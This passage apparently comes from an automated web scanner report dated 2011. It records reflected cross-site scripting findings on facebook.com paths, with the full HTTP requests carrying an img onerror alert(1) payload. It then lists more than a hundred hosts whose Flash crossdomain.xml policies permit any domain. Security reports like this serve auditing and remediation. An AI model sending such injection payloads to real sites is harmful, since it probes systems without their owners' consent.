This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan%20/1000008248207831c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 302 Found
Location: /1000008248207831c030<img src=a onerror=alert(1)>5ccc611056
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.33
X-Cnection: close
Date: Thu, 05 May 2011 11:44:01 GMT
Content-Length: 59

/1000008248207831c030<img src=a onerror=alert(1)>5ccc611056

5.253. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 41583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd was submitted in the REST URL parameter 3. This input was echoed as 41583<img src=a onerror=alert(1)>ab0e5e0e0bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/10000082482078341583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: /10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.236.106
X-Cnection: close
Date: Thu, 05 May 2011 02:52:12 GMT
Content-Length: 60

/10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd

5.254. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 was submitted in the REST URL parameter 4. This input was echoed as a46e0<img src=a onerror=alert(1)>3df2a38ae45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/100000824820783/x22a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /x22a46e0<img src=a onerror=alert(1)>3df2a38ae45
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.43
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 48

/x22a46e0<img src=a onerror=alert(1)>3df2a38ae45

6. Flash cross-domain policy previous next
There are 140 instances of this issue:

http://a0.twimg.com/crossdomain.xml
http://about-search.aol.com/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://ads.pointroll.com/crossdomain.xml
http://ads.undertone.com/crossdomain.xml
http://adx.adnxs.com/crossdomain.xml
http://altfarm.mediaplex.com/crossdomain.xml
http://apartments.rentedspaces.oodle.com/crossdomain.xml
http://api.bit.ly/crossdomain.xml
http://api.oscar.aol.com/crossdomain.xml
http://api.screenname.aol.com/crossdomain.xml
https://api.screenname.aol.com/crossdomain.xml
http://ar.voicefive.com/crossdomain.xml
http://at.atwola.com/crossdomain.xml
https://at.atwola.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://b.voicefive.com/crossdomain.xml
http://bongo.zoomin.tv/crossdomain.xml
http://browser.cdn.aol.com/crossdomain.xml
http://bs.serving-sys.com/crossdomain.xml
http://c.brightcove.com/crossdomain.xml
http://cdn.at.atwola.com/crossdomain.xml
http://cdn.cinesport.com/crossdomain.xml
http://cdn.digitalcity.com/crossdomain.xml
http://cdn.eyewonder.com/crossdomain.xml
http://cdn4.eyewonder.com/crossdomain.xml
http://clk.atdmt.com/crossdomain.xml
http://config.hulu.com/crossdomain.xml
http://content.mqcdn.com/crossdomain.xml
http://coverage.mqcdn.com/crossdomain.xml
http://d.tradex.openx.com/crossdomain.xml
http://d.xp1.ru4.com/crossdomain.xml
http://d1.openx.org/crossdomain.xml
http://daol.aol.com/crossdomain.xml
http://eatps.web.aol.com:9000/crossdomain.xml
http://expapi.oscar.aol.com/crossdomain.xml
http://external.ak.fbcdn.net/crossdomain.xml
http://fls.doubleclick.net/crossdomain.xml
http://graph.facebook.com/crossdomain.xml
http://gravatar.com/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://idcs.interclick.com/crossdomain.xml
http://img-cdn.mediaplex.com/crossdomain.xml
http://img.mediaplex.com/crossdomain.xml
http://lifestream.aol.com/crossdomain.xml
http://log30.doubleverify.com/crossdomain.xml
http://metrics.apple.com/crossdomain.xml
http://mobile.aol.com/crossdomain.xml
http://o.sa.aol.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://portal.pf.aol.com/crossdomain.xml
http://puma.vizu.com/crossdomain.xml
http://r.unicornmedia.com/crossdomain.xml
http://r1-ads.ace.advertising.com/crossdomain.xml
http://s.gravatar.com/crossdomain.xml
http://s3.cinesport.com/crossdomain.xml
http://search.twitter.com/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
http://segment-pixel.invitemedia.com/crossdomain.xml
http://speed.pointroll.com/crossdomain.xml
http://sportingnews.122.2o7.net/crossdomain.xml
http://sportsillustrated.cnn.com/crossdomain.xml
http://t.mookie1.com/crossdomain.xml
http://tcr.tynt.com/crossdomain.xml
http://www.aolcdn.com/crossdomain.xml
http://www.everydayhealth.com/crossdomain.xml
http://www.huffingtonpost.com/crossdomain.xml
http://www.mapquest.com/crossdomain.xml
http://xml.truveo.com/crossdomain.xml
http://abcnews.go.com/crossdomain.xml
http://about.aol.com/crossdomain.xml
http://ad.wsod.com/crossdomain.xml
http://add.my.yahoo.com/crossdomain.xml
http://ads.tw.adsonar.com/crossdomain.xml
https://adwords.google.com/crossdomain.xml
http://aol.sportingnews.com/crossdomain.xml
http://aol.worldwinner.com/crossdomain.xml
http://api.local.yahoo.com/crossdomain.xml
http://ar-ar.facebook.com/crossdomain.xml
http://ax.itunes.apple.com/crossdomain.xml
http://developers.facebook.com/crossdomain.xml
http://disqus.com/crossdomain.xml
http://fantasysource.sportingnews.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://images.apple.com/crossdomain.xml
http://itunes.apple.com/crossdomain.xml
http://js.adsonar.com/crossdomain.xml
http://legal.aol.com/crossdomain.xml
http://money.cnn.com/crossdomain.xml
http://music.aol.com/crossdomain.xml
http://my.screenname.aol.com/crossdomain.xml
https://my.screenname.aol.com/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://o.aolcdn.com/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://picasaweb.google.com/crossdomain.xml
http://privacy.aol.com/crossdomain.xml
http://pubads.g.doubleclick.net/crossdomain.xml
http://realestate.aol.com/crossdomain.xml
http://redir.adsonar.com/crossdomain.xml
https://secure.opinionlab.com/crossdomain.xml
http://static.ak.fbcdn.net/crossdomain.xml
http://television.aol.com/crossdomain.xml
https://us.etrade.com/crossdomain.xml
http://video.aol.com/crossdomain.xml
http://video.foxbusiness.com/crossdomain.xml
http://video.google.com/crossdomain.xml
http://weather.aol.com/crossdomain.xml
http://www.aol.com/crossdomain.xml
http://www.aolnews.com/crossdomain.xml
http://www.apple.com/crossdomain.xml
http://www.blogsmithmedia.com/crossdomain.xml
http://www.citysbest.com/crossdomain.xml
http://www.dailyfinance.com/crossdomain.xml
http://www.dooce.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
https://www.facebook.com/crossdomain.xml
http://www.ft.com/crossdomain.xml
https://www.godaddy.com/crossdomain.xml
http://www.ibm.com/crossdomain.xml
http://www.marketwatch.com/crossdomain.xml
http://www.mmafighting.com/crossdomain.xml
http://www.moviefone.com/crossdomain.xml
http://www.netvibes.com/crossdomain.xml
http://www.pageflakes.com/crossdomain.xml
http://www.popeater.com/crossdomain.xml
http://www.realtytrac.com/crossdomain.xml
http://www.tuaw.com/crossdomain.xml
http://aolmobile.aol.com/crossdomain.xml
http://aolmobile.aolcdn.com/crossdomain.xml
http://api.twitter.com/crossdomain.xml
http://citi.bridgetrack.com/crossdomain.xml
http://docs.google.com/crossdomain.xml
http://s.stats.wordpress.com/crossdomain.xml
http://static.twitter.com/crossdomain.xml
http://stats.wordpress.com/crossdomain.xml
http://twitter.com/crossdomain.xml
https://twitter.com/crossdomain.xml
http://www.truveo.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://a0.twimg.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a0.twimg.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a0.twimg.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:49:48 GMT
Last-Modified: Tue, 21 Dec 2010 23:55:41 GMT
Content-Type: application/xml
ETag: "46c43cac3f2c81be289b141b7c02df9c"
Accept-Ranges: bytes
Server: AmazonS3
X-Amz-Cf-Id: 1a9421094931759c4f7e205ba1f437a58595340a38dfa855000179b2ce1d400ec26c592607367060
x-amz-id-2: alHNUXtFkE6bCmS6U8LI/q84/qrFaMSkhNAlnOeW0EOpWg6EWcymiOtqaEPGh2pO
x-amz-request-id: 69C90925A0E2ADB7
X-Cache: Hit from cloudfront
Content-Length: 206
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.2. http://about-search.aol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://about-search.aol.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: about-search.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:09 GMT
Server: Apache/2.0
Last-Modified: Wed, 13 Dec 2006 20:31:12 GMT
ETag: "9d-4792e400"
Accept-Ranges: bytes
Content-Length: 157
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="*.ru4.com" secure="false" />
</cross-domain-policy>

6.3. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 05 May 2011 00:56:58 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.4. http://ads.pointroll.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:13c9"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Thu, 05 May 2011 00:56:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

6.5. http://ads.undertone.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "426811d-fc-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 252
Content-Type: text/xml
Date: Thu, 05 May 2011 00:59:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.6. http://adx.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adx.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 01:41:35 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.7. http://altfarm.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 05 May 2011 00:56:28 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.8. http://apartments.rentedspaces.oodle.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apartments.rentedspaces.oodle.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: apartments.rentedspaces.oodle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Last-Modified: Wed, 12 Mar 2008 00:55:41 GMT
ETag: "45835b-ca-44832e564dd40"
Content-Type: application/xml
Date: Thu, 05 May 2011 10:52:33 GMT
Content-Length: 202
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.9. http://api.bit.ly/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bit.ly
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bit.ly

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 10:52:31 GMT
Content-Type: text/xml
Content-Length: 141
Last-Modified: Mon, 09 Aug 2010 21:22:00 GMT
Connection: close
Expires: Sat, 07 May 2011 10:52:31 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.10. http://api.oscar.aol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.oscar.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.oscar.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:31 GMT
Server: Apache
Last-Modified: Thu, 12 Oct 2006 16:41:52 GMT
ETag: "ca801a-68-41f9fd940b400"
Accept-Ranges: bytes
Content-Length: 104
Keep-Alive: timeout=1, max=48
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.11. http://api.screenname.aol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.screenname.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.screenname.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:55 GMT
Server: Apache
Last-Modified: Wed, 10 Jun 2009 12:33:23 GMT
ETag: "ea-46bfdae5beac0"
Accept-Ranges: bytes
Content-Length: 234
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=417
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.12. https://api.screenname.aol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://api.screenname.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.screenname.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:31 GMT
Server: Apache
Last-Modified: Wed, 10 Jun 2009 12:33:23 GMT
ETag: "ea-46bfdae5beac0"
Accept-Ranges: bytes
Content-Length: 234
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=499
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.13. http://ar.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:58 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.14. http://at.atwola.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.atwola.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: at.atwola.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.15. https://at.atwola.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://at.atwola.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: at.atwola.com

Response

6.16. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 06 May 2011 00:56:23 GMT
Date: Thu, 05 May 2011 00:56:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.17. http://b.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 06 May 2011 00:56:59 GMT
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.18. http://bongo.zoomin.tv/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bongo.zoomin.tv
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bongo.zoomin.tv

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Length: 319
Content-Type: text/xml
Content-Location: http://bongo.zoomin.tv/crossdomain.xml
Last-Modified: Wed, 10 Sep 2008 12:51:04 GMT
Accept-Ranges: bytes
ETag: "40d9c8e24313c91:644"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 10:52:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" />
...[SNIP]...

6.19. http://browser.cdn.aol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://browser.cdn.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: browser.cdn.aol.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Content-Length: 421
Date: Thu, 05 May 2011 10:52:44 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.20. http://bs.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:39:08 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.21. http://c.brightcove.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.brightcove.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Thu, 10 Mar 2011 21:14:21 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 387
Date: Thu, 05 May 2011 10:52:45 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.22. http://cdn.at.atwola.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.at.atwola.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.at.atwola.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Date: Thu, 05 May 2011 00:57:01 GMT
Content-Length: 421
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
